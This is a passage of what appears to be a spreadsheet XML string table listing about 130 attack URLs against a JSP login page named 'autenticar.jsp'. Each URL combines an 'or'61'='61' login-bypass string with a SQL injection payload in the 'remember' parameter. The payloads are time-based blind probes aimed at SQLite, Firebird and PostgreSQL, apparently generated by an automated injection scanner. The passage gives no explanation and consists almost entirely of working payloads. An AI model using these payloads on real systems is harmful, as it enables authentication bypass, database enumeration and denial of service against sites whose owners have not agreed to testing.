    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and'xbrx'='xbrx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and('prep'like'prep&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and(('lqnj'like'lqnj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and((('smzc'like'smzc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and'bdkg'like'bdkg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and("logc"="logc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and(("lkax"="lkax&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and((("nxjy"="nxjy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and"usiz"="usiz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and("izeq"like"izeq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and(("ybad"like"ybad&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and((("ewpf"like"ewpf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and"qwfi"like"qwfi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and(2288=2288&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and((45=45&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and(((1252=1252&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and('cimt'='cimt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and(('syyh'='syyh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and((('tcao'='tcao&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and'duac'='duac&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and('dktg'like'dktg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and(('ymva'like'ymva&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and((('kmvo'like'kmvo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and'ksat'like'ksat&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and("afbo"="afbo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and(("jjyy"="jjyy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and((("murv"="murv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and"gsfn"="gsfn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and("ruqa"like"ruqa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and(("xhxe"like"xhxe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and((("ydso"like"ydso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and"rtjo"like"rtjo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and98=(select98frompg_sleep(5))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and98=(select98frompg_sleep(5))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and98=(select98frompg_sleep(5))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and98=(select98frompg_sleep(5))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and98=(select98frompg_sleep(5))and(2458=2458&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and98=(select98frompg_sleep(5))and((8165=8165&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and98=(select98frompg_sleep(5))and(((8864=8864&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and98=(select98frompg_sleep(5))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and98=(select98frompg_sleep(5))and('ircu'='ircu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and98=(select98frompg_sleep(5))and(('ljoz'='ljoz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and98=(select98frompg_sleep(5))and((('ldzf'='ldzf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and98=(select98frompg_sleep(5))and'iipt'='iipt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and98=(select98frompg_sleep(5))and('pjyg'like'pjyg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and98=(select98frompg_sleep(5))and(('qrwr'like'qrwr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and98=(select98frompg_sleep(5))and((('rnti'like'rnti&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and98=(select98frompg_sleep(5))and'xcsa'like'xcsa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and98=(select98frompg_sleep(5))and("cuzh"="cuzh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and98=(select98frompg_sleep(5))and(("ooti"="ooti&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and98=(select98frompg_sleep(5))and((("pytk"="pytk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and98=(select98frompg_sleep(5))and"emgf"="emgf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and98=(select98frompg_sleep(5))and("gsgm"like"gsgm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and98=(select98frompg_sleep(5))and(("ifwo"like"ifwo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and98=(select98frompg_sleep(5))and((("ksor"like"ksor&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and98=(select98frompg_sleep(5))and"tqyd"like"tqyd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and9563=(select9563frompg_sleep(5))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and9563=(select9563frompg_sleep(5))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and9563=(select9563frompg_sleep(5))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and9563=(select9563frompg_sleep(5))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and9563=(select9563frompg_sleep(5))--and(5496=5496&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and9563=(select9563frompg_sleep(5))--and((2725=2725&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and9563=(select9563frompg_sleep(5))--and(((5974=5974&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and9563=(select9563frompg_sleep(5))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and9563=(select9563frompg_sleep(5))--and('pijb'='pijb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and9563=(select9563frompg_sleep(5))--and(('ougf'='ougf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and9563=(select9563frompg_sleep(5))--and((('dmkr'='dmkr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and9563=(select9563frompg_sleep(5))--and'eddp'='eddp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and9563=(select9563frompg_sleep(5))--and('lwsx'like'lwsx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and9563=(select9563frompg_sleep(5))--and(('bmfz'like'bmfz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and9563=(select9563frompg_sleep(5))--and((('pfxv'like'pfxv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and9563=(select9563frompg_sleep(5))--and'utue'like'utue&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and9563=(select9563frompg_sleep(5))--and("zcwh"="zcwh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and9563=(select9563frompg_sleep(5))--and(("moek"="moek&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and9563=(select9563frompg_sleep(5))--and((("jxbm"="jxbm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and9563=(select9563frompg_sleep(5))--and"evqy"="evqy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and9563=(select9563frompg_sleep(5))--and("pcjk"like"pcjk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and9563=(select9563frompg_sleep(5))--and(("xonp"like"xonp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and9563=(select9563frompg_sleep(5))--and((("gifh"like"gifh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and9563=(select9563frompg_sleep(5))--and"elvd"like"elvd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and5286=(selectcount(*)fromgenerate_series(1,5000000))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5286=(selectcount(*)fromgenerate_series(1,5000000))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5286=(selectcount(*)fromgenerate_series(1,5000000))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5286=(selectcount(*)fromgenerate_series(1,5000000))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and5286=(selectcount(*)fromgenerate_series(1,5000000))and(4826=4826&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and5286=(selectcount(*)fromgenerate_series(1,5000000))and((775=775&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and5286=(selectcount(*)fromgenerate_series(1,5000000))and(((3700=3700&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and5286=(selectcount(*)fromgenerate_series(1,5000000))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5286=(selectcount(*)fromgenerate_series(1,5000000))and('grsm'='grsm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and5286=(selectcount(*)fromgenerate_series(1,5000000))and(('spqk'='spqk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and5286=(selectcount(*)fromgenerate_series(1,5000000))and((('fcmg'='fcmg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5286=(selectcount(*)fromgenerate_series(1,5000000))and'qywp'='qywp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5286=(selectcount(*)fromgenerate_series(1,5000000))and('vrox'like'vrox&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and5286=(selectcount(*)fromgenerate_series(1,5000000))and(('nbuu'like'nbuu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and5286=(selectcount(*)fromgenerate_series(1,5000000))and((('behn'like'behn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5286=(selectcount(*)fromgenerate_series(1,5000000))and'twfg'like'twfg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and5286=(selectcount(*)fromgenerate_series(1,5000000))and("jqhg"="jqhg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and5286=(selectcount(*)fromgenerate_series(1,5000000))and(("dwhg"="dwhg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and5286=(selectcount(*)fromgenerate_series(1,5000000))and((("ckil"="ckil&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5286=(selectcount(*)fromgenerate_series(1,5000000))and"wyhn"="wyhn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and5286=(selectcount(*)fromgenerate_series(1,5000000))and("mkvg"like"mkvg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and5286=(selectcount(*)fromgenerate_series(1,5000000))and(("xbuf"like"xbuf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and5286=(selectcount(*)fromgenerate_series(1,5000000))and((("ibmm"like"ibmm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5286=(selectcount(*)fromgenerate_series(1,5000000))and"yuwi"like"yuwi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and1792=(selectcount(*)fromgenerate_series(1,5000000))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and1792=(selectcount(*)fromgenerate_series(1,5000000))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and1792=(selectcount(*)fromgenerate_series(1,5000000))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and1792=(selectcount(*)fromgenerate_series(1,5000000))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and1792=(selectcount(*)fromgenerate_series(1,5000000))--and(1089=1089&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and1792=(selectcount(*)fromgenerate_series(1,5000000))--and((3213=3213&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and1792=(selectcount(*)fromgenerate_series(1,5000000))--and(((4714=4714&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and1792=(selectcount(*)fromgenerate_series(1,5000000))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and1792=(selectcount(*)fromgenerate_series(1,5000000))--and('lect'='lect&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and1792=(selectcount(*)fromgenerate_series(1,5000000))--and(('utrs'='utrs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and1792=(selectcount(*)fromgenerate_series(1,5000000))--and((('mzvx'='mzvx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and1792=(selectcount(*)fromgenerate_series(1,5000000))--and'xnqx'='xnqx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and1792=(selectcount(*)fromgenerate_series(1,5000000))--and('smrx'like'smrx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and1792=(selectcount(*)fromgenerate_series(1,5000000))--and(('raob'like'raob&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and1792=(selectcount(*)fromgenerate_series(1,5000000))--and((('stqd'like'stqd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and1792=(selectcount(*)fromgenerate_series(1,5000000))--and'dhdm'like'dhdm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and1792=(selectcount(*)fromgenerate_series(1,5000000))--and("vuvq"="vuvq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and1792=(selectcount(*)fromgenerate_series(1,5000000))--and(("eryw"="eryw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and1792=(selectcount(*)fromgenerate_series(1,5000000))--and((("xrdl"="xrdl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and1792=(selectcount(*)fromgenerate_series(1,5000000))--and"kmnw"="kmnw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and1792=(selectcount(*)fromgenerate_series(1,5000000))--and("avoi"like"avoi&amp;modo=entrar</t>
  </si>
  <si>
